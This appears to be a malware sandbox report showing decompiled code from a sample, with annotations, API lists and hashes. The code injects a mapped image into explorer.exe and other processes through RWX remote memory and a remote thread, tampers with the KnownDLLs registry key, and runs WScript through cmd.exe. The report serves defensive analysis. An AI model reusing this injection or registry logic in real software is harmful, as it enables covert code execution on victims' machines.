	// Note: _t45, _t46, _t50, _t57 and _t186 are decompiler temporaries that were
	// emitted without declarations; labels L4 and L11 lie outside this fragment.

	_t186 = _a4;
	_v8 = 0;
	_v16 = 0;
	_v12 = 0;
	_v24 = 0;
	_v28 = 0;
	_v20 = 0;
	_v48 = 0;
	_v44 = 0;
	 *_a20 = 0;
	_t196 =  *0x1631094(_a4); // indirect call through a resolved pointer; result is treated as the NT headers of the image at _a4
	_v40 = _t196;
	if( *_t196 != 0x4550) { // 0x4550 == 'PE' (IMAGE_NT_SIGNATURE)
		L5:
		return 0;
	} else {
		_v28 =  *((intOrPtr*)(_t196 + 0x50)); // OptionalHeader.SizeOfImage (offset 0x50 from the NT headers)
		_v56 = _a8; // caller-supplied value; layout suggests a CLIENT_ID holding the target process id (inference)
		_v80 = 0x18; // 0x18 == sizeof(OBJECT_ATTRIBUTES) on 32-bit
		_v76 = 0;
		_v68 = 0;
		_v72 = 0;
		_v64 = 0;
		_v60 = 0;
		_v52 = 0;
		_t112 =  *0x1631098( &_v8, 0x1fffff,  &_v80,  &_v56); // 0x1fffff == PROCESS_ALL_ACCESS; argument pattern matches NtOpenProcess (inference), handle returned in _v8
		if(_t112 != 0) {
			goto L5;
		} else {
			_t208 =  *0x1631314 - _t112; // 0x1
			if(_t208 == 0) {
				L6:
				_t115 =  *0x16310a8(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // 0x3000 == MEM_COMMIT|MEM_RESERVE, 0x40 == PAGE_EXECUTE_READWRITE; allocates SizeOfImage bytes in the opened process (NtAllocateVirtualMemory-style, inference)
				__eflags = _t115;
				if(_t115 != 0) {
					goto L4;
				} else {
					_t170 = VirtualAlloc(_t115, _v28, 0x3000, 0x40); // local RWX staging buffer of the same size
					__eflags = _t170;
					if(_t170 == 0) {
						L43: // common failure/cleanup path
						__eflags = _v12;
						if(_v12 != 0) {
							 *0x16310ac(_v8,  &_v12,  &_v20, 0x8000); // 0x8000 == MEM_RELEASE; frees the remote image region (NtFreeVirtualMemory-style, inference)
						}
						_t118 = _v8;
						__eflags = _t118;
						if(_t118 != 0) {
							 *0x1631088(_t118); // closes the process handle (NtClose-style, inference)
							_t118 = _v8;
						}
						__eflags = _t170;
						if(_t170 != 0) {
							VirtualFree(_t170, 0, 0x8000);
							_t118 = _v8;
						}
						__eflags = _v24;
						_v20 = 0;
						if(_v24 != 0) {
							 *0x16310ac(_t118,  &_v24,  &_v20, 0x8000); // frees the remote parameter region
						}
						_t119 = _v16;
						__eflags = _t119;
						if(_t119 != 0) {
							 *0x1631088(_t119); // closes the thread handle
						}
						__eflags = 0;
						return 0;
					} else {
						E01461640(_t170, _t186, _v28); // copy SizeOfImage bytes from the source image (_a4) into the local buffer (memcpy-style helper, inference)
						_t205 = _t204 + 0xc;
						_t188 =  *((intOrPtr*)(_t196 + 0x80)) + _t170; // DataDirectory[1] (import table) RVA, resolved inside the local copy
						__eflags = _t188;
						while(1) {
							_t129 = _t188[0xc]; // IMAGE_IMPORT_DESCRIPTOR.Name (offset 12)
							_v32 = _t188;
							__eflags = _t129;
							if(_t129 != 0) {
								goto L11; // descriptor still has a module name: import processing (outside this fragment)
							}
							__eflags = _t188[4] - _t129;
							if(_t188[4] == _t129) { // zero descriptor: end of the import table, apply base relocations next
								_t136 = _v40;
								_t177 = _v12;
								_t192 = _a4;
								_t45 = _t136 + 0xa0; // DataDirectory[5] (base relocation table) RVA
								_t46 = _t136 + 0x34; // OptionalHeader.ImageBase
								_t137 =  *_t46;
								_t201 =  *_t45 + _t170; // first IMAGE_BASE_RELOCATION block in the local copy
								_v40 = _t177 - _t137; // remote base minus preferred ImageBase
								__eflags =  *_t201;
								_v36 = _t192 - _t137; // source base minus preferred ImageBase
								if( *_t201 != 0) {
									do {
										_t193 = _t201[1]; // IMAGE_BASE_RELOCATION.SizeOfBlock
										_t50 =  &(_t201[1]); // 0x45dd842e
										_t165 = _t50;
										_v32 = _t165;
										__eflags = _t193 - 8;
										if(_t193 >= 8) {
											_t185 = 0;
											_t195 =  &(_t193[0xfffffffffffffff8]) >> 1; // (SizeOfBlock - 8) / 2 == number of 16-bit entries
											__eflags = _t195;
											if(_t195 != 0) {
												asm("o16 nop [eax+eax]");
												do {
													_t178 =  *(_t201 + 8 + _t185 * 2) & 0x0000ffff; // relocation entry; low 12 bits are the page offset
													__eflags = _t178;
													if(_t178 != 0) {
														// the 4-bit type field is ignored: every non-zero entry is treated as HIGHLOW
														_t180 =  &(( *_t201)[_t178 & 0x00000fff]); // page RVA + offset
														_t57 =  &(_t180[_t170]);
														 *_t57 = _t180[_t170] + _v40 - _v36; // add (remote base - source base) in the local copy
														__eflags =  *_t57;
													}
													_t185 = _t185 + 1;
													__eflags = _t185 - _t195;
												} while (_t185 < _t195);
												_t165 = _v32;
											}
										}
										_t201 = _t201 +  *_t165; // advance by SizeOfBlock
										__eflags =  *_t201;
									} while ( *_t201 != 0);
									_t177 = _v12;
									_t192 = _a4;
								}
								_t138 =  *0x163109c(_v8, _t177, _t170, _v28, 0); // writes the relocated local copy to the remote base (NtWriteVirtualMemory-style, inference)
								__eflags = _t138;
								if(_t138 < 0) {
									goto L43;
								} else {
									_t202 = _a16;
									_t141 =  *0x16310a8(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // second remote allocation of _a16 bytes, 4 == PAGE_READWRITE
									__eflags = _t141;
									if(_t141 != 0) {
										goto L43;
									} else {
										_t142 =  *0x163109c(_v8, _v24, _a12, _t202, _t141); // copies the caller's parameter block (_a12) into it
										__eflags = _t142;
										if(_t142 < 0) {
											goto L43;
										} else {
											// start address: _a24 rebased from the source image to the remote base; parameter: the remote block; thread handle out in _v16
											// argument pattern matches RtlCreateUserThread (inference)
											_t147 =  *0x16310a0(_v8, 0, 0, 0, 0, 0, _v12 - _t192 + _a24, _v24,  &_v16, 0);
											__eflags = _t147;
											if(_t147 < 0) {
												goto L43;
											} else {
												asm("xorps xmm0, xmm0"); // zero an 8-byte value with SSE; rendered as inline asm by the decompiler
												asm("movlpd [ebp-0x2c], xmm0");
												_t149 =  *0x16310a4(_v16, 0,  &_v48); // wait on the thread handle with a timeout (NtWaitForSingleObject-style, inference)
												__eflags = _t149 - 0x102; // 0x102 == STATUS_TIMEOUT
												if(_t149 == 0x102) {
													while(1) {
														__eflags =  *0x1632118; // global stop flag
														if( *0x1632118 != 0) {
															break;
														}
														Sleep(0xbb8); // 3000 ms between polls
														_t164 =  *0x16310a4(_v16, 0,  &_v48);
														__eflags = _t164 - 0x102;
														if(_t164 == 0x102) {
															continue;
														} else {
														}
														goto L41;
													}
													TerminateThread(_v16, 0); // stop flag was set while the thread was still running
												}
												L41:
												_t150 = GetExitCodeThread(_v16, _a20); // exit code is returned to the caller through _a20
												__eflags = _t150;
												if(_t150 == 0) {
													goto L43;
                                                                                                        															} else {
                                                                                                        																 *0x1631088(_v16);
                                                                                                        																 *0x16310ac(_v8,  &_v12,  &_v20, 0x8000);
                                                                                                        																 *0x1631088(_v8);
                                                                                                        																VirtualFree(_t170, 0, 0x8000);
                                                                                                        																_v20 = 0;
                                                                                                        																 *0x16310ac(_v8,  &_v24,  &_v20, 0x8000);
                                                                                                        																return 1;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										} else {
                                                                                                        											goto L11;
                                                                                                        										}
                                                                                                        										goto L54;
                                                                                                        										L11:
                                                                                                        										_t176 = E01468B00( &(_t129[_t170]));
                                                                                                        										_t205 = _t205 + 4;
                                                                                                        										_v36 = _t176;
                                                                                                        										__eflags = _t176;
                                                                                                        										if(_t176 == 0) {
                                                                                                        											goto L43;
                                                                                                        										} else {
                                                                                                        											_t198 = _t170 +  *_t188;
                                                                                                        											_t190 = _t170 + _t188[0x10];
                                                                                                        											__eflags = _t198 - _t170;
                                                                                                        											_t199 =  ==  ? _t190 : _t198;
                                                                                                        											__eflags = _t199 - _t170;
                                                                                                        											if(_t199 == _t170) {
                                                                                                        												goto L43;
                                                                                                        											} else {
                                                                                                        												_t132 =  *_t199;
                                                                                                        												__eflags = _t132;
                                                                                                        												if(__eflags == 0) {
                                                                                                        													L19:
                                                                                                        													_t188 =  &(_v32[0x14]);
                                                                                                        													continue;
                                                                                                        												} else {
                                                                                                         													L14:
                                                                                                        													if(__eflags >= 0) {
                                                                                                        														_t134 = _t132 + 2 + _t170;
                                                                                                        														__eflags = _t134;
                                                                                                        													} else {
                                                                                                        														_t134 = _t132 & 0x0000ffff;
                                                                                                        													}
                                                                                                        													_t135 = GetProcAddress(_t176, _t134);
                                                                                                        													 *_t190 = _t135;
                                                                                                        													__eflags = _t135;
                                                                                                        													if(_t135 == 0) {
                                                                                                        														goto L43;
                                                                                                        													}
                                                                                                        													_t132 = _t199[2];
                                                                                                        													_t199 =  &(_t199[2]);
                                                                                                        													_t176 = _v36;
                                                                                                        													_t190 = _t190 + 4;
                                                                                                        													__eflags = _t132;
                                                                                                        													if(__eflags != 0) {
                                                                                                        														goto L14;
                                                                                                        													} else {
                                                                                                        														goto L19;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        										goto L54;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t168 = E01468270(__ecx, _v8);
                                                                                                        							_t204 = _t204 + 4;
                                                                                                        							if(_t168 != 0) {
                                                                                                        								goto L6;
                                                                                                        							} else {
                                                                                                        								L4:
                                                                                                        								 *0x1631088(_v8);
                                                                                                        								goto L5;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L54:
                                                                                                        			}
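The import-resolution loop above (the `GetProcAddress(_t176, _t134)` call and the branch feeding it) is the standard 32-bit thunk decode of a manual PE mapper: when the thunk value is non-negative, i.e. `IMAGE_ORDINAL_FLAG32` (bit 31) is clear, it is an RVA to an `IMAGE_IMPORT_BY_NAME` record and the function name starts 2 bytes in, after the WORD hint (hence `_t132 + 2 + _t170`); when bit 31 is set, the low 16 bits are an export ordinal (`_t132 & 0xffff`) and are passed to `GetProcAddress` in place of a name pointer; a zero thunk ends the list. The following C program is an added example, not code from the sample or from the Joe Sandbox report; it re-implements that decision over a constructed in-memory image with no Windows dependencies, so an analyst can check the decode logic outside the sandbox. The image buffer, the RVA `0x100`, the hint value and the ordinal `15` are all assumptions made up for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed example: re-implements the thunk decision seen in the decompiled
 * loader. Bit 31 set  -> import by ordinal (low 16 bits).
 *          Bit 31 clear -> RVA of IMAGE_IMPORT_BY_NAME; name follows a 2-byte hint.
 *          Zero         -> end of the thunk list. */

#define IMAGE_ORDINAL_FLAG32 0x80000000u

enum thunk_kind { THUNK_END = 0, THUNK_BY_NAME = 1, THUNK_BY_ORDINAL = 2 };

struct import_ref {
    enum thunk_kind kind;
    uint16_t ordinal;    /* valid when kind == THUNK_BY_ORDINAL */
    const char *name;    /* valid when kind == THUNK_BY_NAME */
};

/* Decode one 32-bit IMAGE_THUNK_DATA entry relative to the mapped image base.
 * Mirrors "_t132 + 2 + _t170" (by name) and "_t132 & 0xffff" (by ordinal). */
static struct import_ref decode_thunk(const uint8_t *image_base, uint32_t thunk)
{
    struct import_ref ref = { THUNK_END, 0, NULL };
    if (thunk == 0)
        return ref;
    if (thunk & IMAGE_ORDINAL_FLAG32) {
        ref.kind = THUNK_BY_ORDINAL;
        ref.ordinal = (uint16_t)(thunk & 0xffff);
    } else {
        ref.kind = THUNK_BY_NAME;
        ref.name = (const char *)(image_base + thunk + 2);  /* skip WORD hint */
    }
    return ref;
}

/* Walk a zero-terminated thunk array; returns the number of imports found. */
static size_t decode_thunk_list(const uint8_t *image_base, const uint32_t *thunks,
                                struct import_ref *out, size_t max)
{
    size_t n = 0;
    while (n < max) {
        out[n] = decode_thunk(image_base, thunks[n]);
        if (out[n].kind == THUNK_END)
            break;
        n++;
    }
    return n;
}

/* Constructed in-memory "image" (assumption): one IMAGE_IMPORT_BY_NAME at RVA 0x100,
 * followed by a thunk array importing it by name and a second export by ordinal 15. */
static uint8_t g_image[0x200];
static const uint32_t g_thunks[] = { 0x100, IMAGE_ORDINAL_FLAG32 | 0x0f, 0 };

static void build_sample_image(void)
{
    memset(g_image, 0, sizeof g_image);
    g_image[0x100] = 0x34;   /* hint, low byte (arbitrary) */
    g_image[0x101] = 0x12;   /* hint, high byte (arbitrary) */
    memcpy(g_image + 0x102, "GetProcAddress", sizeof "GetProcAddress");
}

int main(void)
{
    struct import_ref refs[4];
    build_sample_image();
    size_t n = decode_thunk_list(g_image, g_thunks, refs, 4);
    for (size_t i = 0; i < n; i++) {
        if (refs[i].kind == THUNK_BY_NAME)
            printf("import by name: %s\n", refs[i].name);
        else
            printf("import by ordinal: #%u\n", refs[i].ordinal);
    }
    return 0;
}
```

Compile with any C99 compiler (`cc -std=c99 thunk.c`); the program prints the by-name import followed by the ordinal import. A real loader would then hand `ref.name` or `(LPCSTR)(uintptr_t)ref.ordinal` to `GetProcAddress` and write the result into the IAT slot, exactly as the decompiled code does with `*_t190 = _t135`.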
(Instruction address column for the decompiled function above, spilled out of alignment by extraction; the statements map to addresses in the range 0x014629eb to 0x01462dc2.)
                                                                                                        0x01462ce8
                                                                                                        0x01462c7d
                                                                                                        0x01462c50
                                                                                                        0x01462c37
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b1e
                                                                                                        0x01462b26
                                                                                                        0x01462b28
                                                                                                        0x01462b2b
                                                                                                        0x01462b2e
                                                                                                        0x01462b30
                                                                                                        0x00000000
                                                                                                        0x01462b36
                                                                                                        0x01462b3b
                                                                                                        0x01462b3d
                                                                                                        0x01462b3f
                                                                                                        0x01462b41
                                                                                                        0x01462b44
                                                                                                        0x01462b46
                                                                                                        0x00000000
                                                                                                        0x01462b4c
                                                                                                        0x01462b4c
                                                                                                        0x01462b4e
                                                                                                        0x01462b50
                                                                                                        0x01462b80
                                                                                                        0x01462b83
                                                                                                        0x00000000
                                                                                                        0x01462b52
                                                                                                        0x00000000
                                                                                                        0x01462b52
                                                                                                        0x01462b52
                                                                                                        0x01462b5c
                                                                                                        0x01462b5c
                                                                                                        0x01462b54
                                                                                                        0x01462b54
                                                                                                        0x01462b54
                                                                                                        0x01462b60
                                                                                                        0x01462b66
                                                                                                        0x01462b68
                                                                                                        0x01462b6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b70
                                                                                                        0x01462b73
                                                                                                        0x01462b76
                                                                                                        0x01462b79
                                                                                                        0x01462b7c
                                                                                                        0x01462b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b7e
                                                                                                        0x01462b50
                                                                                                        0x01462b46
                                                                                                        0x00000000
                                                                                                        0x01462b30
                                                                                                        0x01462b0f
                                                                                                        0x01462af4
                                                                                                        0x01462aa0
                                                                                                        0x01462aa3
                                                                                                        0x01462aa8
                                                                                                        0x01462aad
                                                                                                        0x00000000
                                                                                                        0x01462aaf
                                                                                                        0x01462aaf
                                                                                                        0x01462ab2
                                                                                                        0x00000000
                                                                                                        0x01462ab2
                                                                                                        0x01462aad
                                                                                                        0x01462a9e
                                                                                                        0x01462a96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 01462AEA
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 01462B60
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 01462CB5
                                                                                                        • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 01462CE0
                                                                                                          • Part of subcall function 01468270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,01463432), ref: 01468285
                                                                                                          • Part of subcall function 01468270: GetProcAddress.KERNEL32(00000000,?,?,01463432), ref: 0146828C
                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 01462CD4
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01462D1A
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01462D82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AddressFreeProcThread$AllocCodeExitHandleModuleSleepTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 844144628-0
                                                                                                        • Opcode ID: 87d78d6e66a0f30d14776295b6d6d1d168f788b11d39327d3cc5c0681a28b73f
                                                                                                        • Instruction ID: 60d6935ea7809c4826a2bd011aa9aa8f80072b78f07a614087ad7ff355d3e23a
                                                                                                        • Opcode Fuzzy Hash: 87d78d6e66a0f30d14776295b6d6d1d168f788b11d39327d3cc5c0681a28b73f
                                                                                                        • Instruction Fuzzy Hash: E1C13C71A00209FFEF20CF95DD45BEEBBB9FF04708F14402AE905A6260D7B19A55CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467ED0: GetFileAttributesW.KERNEL32(?,?,014631D3,014647C4,014647C4,\System32\wuapp.exe,014647C4,?,00000000), ref: 01467ED6
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 014638CD
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 01463900
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01463942
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01463986
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$FileFree$AllocAttributesSize
                                                                                                        • String ID: 0125789244697858$@
                                                                                                        • API String ID: 1658238082-3353267005
                                                                                                        • Opcode ID: cd12c1d962eeb84e9d82e6debdbc54a55b4fa9356f5ccd4dcec29498180d6430
                                                                                                        • Instruction ID: ca07da6a91a0594dd6780e262b98e671488872ca60c8ca22bd9e0846b1adbaad
                                                                                                        • Opcode Fuzzy Hash: cd12c1d962eeb84e9d82e6debdbc54a55b4fa9356f5ccd4dcec29498180d6430
                                                                                                        • Instruction Fuzzy Hash: 4C414F70E40318ABFB208F94DD49BDEBBB8BB04719F104156F608B52D0DBB556188BA6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E01468450(char* __ecx, void* __eflags) {
                                                                                                        				char _v8;
                                                                                                        				char _v1032;
                                                                                                        				char _v1036;
                                                                                                        				long _v1040;
                                                                                                        				char _v5136;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* _t24;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        				intOrPtr _t39;
                                                                                                        				signed int _t41;
                                                                                                        				void* _t43;
                                                                                                        				void* _t44;
                                                                                                        				void* _t46;
                                                                                                        				void* _t47;
                                                                                                        
                                                                                                        				_t37 = __ecx;
                                                                                                        				E01461BB0( &_v5136, 0, 0x1000);
                                                                                                        				E01461BB0( &_v1036, 0, 0x404);
                                                                                                        				E01461670( &_v1036, 0, 0x404);
                                                                                                        				_v1036 = GetCurrentProcessId();
                                                                                                        				E01461A00( &_v1032, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
                                                                                                        				_t46 = _t44 + 0x2c;
                                                                                                        				_push(_t35);
                                                                                                        				_push(_t41);
                                                                                                        				_push(_t39);
                                                                                                        				L1:
                                                                                                        				while(1) {
                                                                                                        					if( *0x1631314 == 0) {
                                                                                                        						_t24 = E01467EF0("explorer.exe");
                                                                                                        						_t47 = _t46 + 4;
                                                                                                        						if(_t24 != 0) {
                                                                                                        							_t37 =  &_v1036;
                                                                                                        							E014629E0( &_v1036, 0x1460000, _t24,  &_v1036, 0x404,  &_v8, E01468390);
                                                                                                        							_t46 = _t47 + 0x18;
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_v1040 = 0;
                                                                                                        						_t35 = E014680E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000);
                                                                                                        						_t46 = _t46 + 0xc;
                                                                                                        						if(_t35 != 0) {
                                                                                                        							_t41 = 0;
                                                                                                        							if(_t35 != 0) {
                                                                                                        								while( *0x1632118 == 0) {
                                                                                                        									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
                                                                                                        									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
                                                                                                        										L8:
                                                                                                        										_t41 = _t41 + 1;
                                                                                                        										if(_t41 < _t35) {
                                                                                                        											continue;
                                                                                                        										} else {
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t34 = E014629E0(_t37, 0x1460000, _t39,  &_v1036, 0x404,  &_v8, E01468390);
                                                                                                        										_t46 = _t46 + 0x18;
                                                                                                        										if(_t34 == 0) {
                                                                                                        											goto L8;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							L12:
                                                                                                        							if( *0x1632118 != 0) {
                                                                                                        								ExitThread(0);
                                                                                                        							}
                                                                                                        							Sleep(0x1f4);
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}

                                                                                                        0x01468450
                                                                                                        0x01468467
                                                                                                        0x0146847a
                                                                                                        0x0146848d
                                                                                                        0x0146849b
                                                                                                        0x014684ad
                                                                                                        0x014684b2
                                                                                                        0x014684b5
                                                                                                        0x014684b6
                                                                                                        0x014684b7
                                                                                                        0x00000000
                                                                                                        0x014684c0
                                                                                                        0x014684c7
                                                                                                        0x01468552
                                                                                                        0x01468557
                                                                                                        0x0146855c
                                                                                                        0x0146856c
                                                                                                        0x01468579
                                                                                                        0x0146857e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe, xrefs: 014684A7
                                                                                                        • explorer.exe, xrefs: 0146854D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitSleepThread
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$explorer.exe
                                                                                                        • API String ID: 970816010-4120632074
                                                                                                        • Opcode ID: a27ea501fe5a89eeaaeda0694e6a3702c435456bb227a9459b17e8f184a88c06
                                                                                                        • Instruction ID: 2866b307ed1a78f3a2a4e5e7ba188935b72a5ebae64e3412546da7c249a449e8
                                                                                                        • Opcode Fuzzy Hash: a27ea501fe5a89eeaaeda0694e6a3702c435456bb227a9459b17e8f184a88c06
                                                                                                        • Instruction Fuzzy Hash: 28315FF5A403166AEB20AA529C46FE7376C5B5474DF0400AFEB08B2175EAB05A4987B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E01466CA0(intOrPtr _a4) {
                                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                                        				struct _STARTUPINFOW _v88;
                                                                                                        				short _v1128;
                                                                                                        				long _t25;
                                                                                                        
                                                                                                        				E01461BB0( &_v88, 0, 0x44);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movups [ebp-0x10], xmm0");
                                                                                                        				E01461A00( &_v1128, L"cmd.exe /C WScript \"");
                                                                                                        				E01461970( &_v1128, _a4 - 0xffffff80);
                                                                                                        				E01461970( &_v1128, "\"");
                                                                                                        				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                        				if(_t25 != 0) {
                                                                                                        					CloseHandle(_v20.hThread);
                                                                                                        					CloseHandle(_v20);
                                                                                                        					ExitThread(_v20.dwProcessId);
                                                                                                        				}
                                                                                                        				ExitThread(_t25);
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01466D15
                                                                                                        • ExitThread.KERNEL32 ref: 01466D20
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01466D29
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01466D32
                                                                                                        • ExitThread.KERNEL32 ref: 01466D3B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleThread$CreateProcess
                                                                                                        • String ID: cmd.exe /C WScript "
                                                                                                        • API String ID: 3397019416-3599441821
                                                                                                        • Opcode ID: ba8cfc9d9555653b13776f3c57511aee66d4d2700083e32f489e188165c51f3f
                                                                                                        • Instruction ID: c99367b907e0dcb06a12959b209f6ce716a06760144b0d8a1878126d86b1e52d
                                                                                                        • Opcode Fuzzy Hash: ba8cfc9d9555653b13776f3c57511aee66d4d2700083e32f489e188165c51f3f
                                                                                                        • Instruction Fuzzy Hash: 05115EB1940209BEDB20DBE1CD49F9E777CAF25B08F200155F205E60A5EBB1A644CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E01462DD0(void* __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				long _t8;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f,  &_v8);
                                                                                                        				if(_t8 == 0) {
                                                                                                        					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E01461B40(L"ntdll.dll") * 2);
                                                                                                        					return RegCloseKey(_v8);
                                                                                                        				}
                                                                                                        				return _t8;
                                                                                                        			}






                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,01462F21), ref: 01462DF0
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 01462E20
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01462E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenValue
                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                        • API String ID: 779948276-834112533
                                                                                                        • Opcode ID: 62af65ac8808b1e79b48f89da129e6fa7fb6170cd20fb0b64eef43b843ba6815
                                                                                                        • Instruction ID: 089bdb3bf1413dc3388721ae76e81a80b9f7ef3b6bb7756c55e3e81ceb5b78de
                                                                                                        • Opcode Fuzzy Hash: 62af65ac8808b1e79b48f89da129e6fa7fb6170cd20fb0b64eef43b843ba6815
                                                                                                        • Instruction Fuzzy Hash: 46F0A0B1681308BFEB209B91DD07FA9767CE744B0CF20005AFA01A2175E6F16A10D643
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E01464DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                        				char _v1784;
                                                                                                        				intOrPtr _v1788;
                                                                                                        				char _v1792;
                                                                                                        				intOrPtr _v1796;
                                                                                                        				char _v2052;
                                                                                                        				intOrPtr _v2056;
                                                                                                        				char _v2568;
                                                                                                        				char _v3080;
                                                                                                        				intOrPtr _v3084;
                                                                                                        				char _v3148;
                                                                                                        				char _v3276;
                                                                                                        				intOrPtr _t41;
                                                                                                        				intOrPtr _t42;
                                                                                                        				intOrPtr _t43;
                                                                                                        				void* _t46;
                                                                                                        				char _t52;
                                                                                                        				char _t62;
                                                                                                        				void* _t76;
                                                                                                        				short _t79;
                                                                                                        				void* _t84;
                                                                                                        				intOrPtr _t85;
                                                                                                        				void* _t86;
                                                                                                        				void* _t87;
                                                                                                        				void* _t88;
                                                                                                        				void* _t89;
                                                                                                        				void* _t92;
                                                                                                        				void* _t93;
                                                                                                        
                                                                                                        				_t93 = __eflags;
                                                                                                        				_t80 = __edx;
                                                                                                        				_t79 = __ecx;
                                                                                                        				E01461670( &_v3276, 0, 0xcc8);
                                                                                                        				_t41 =  *0x1631bb4; // 0x1e
                                                                                                        				_t81 = _a4;
                                                                                                        				_v2056 = _t41;
                                                                                                        				_t42 =  *0x1631bbc; // 0xa
                                                                                                        				_v1796 = _t42;
                                                                                                        				_t43 =  *0x1631c24; // 0x0
                                                                                                        				_v1788 = _t43;
                                                                                                        				_t84 = E01464B00(_t79, __edx, _t93, _a4);
                                                                                                        				_t87 = _t86 + 0x10;
                                                                                                        				_t94 = _t84;
                                                                                                        				if(_t84 != 0) {
                                                                                                        					L5:
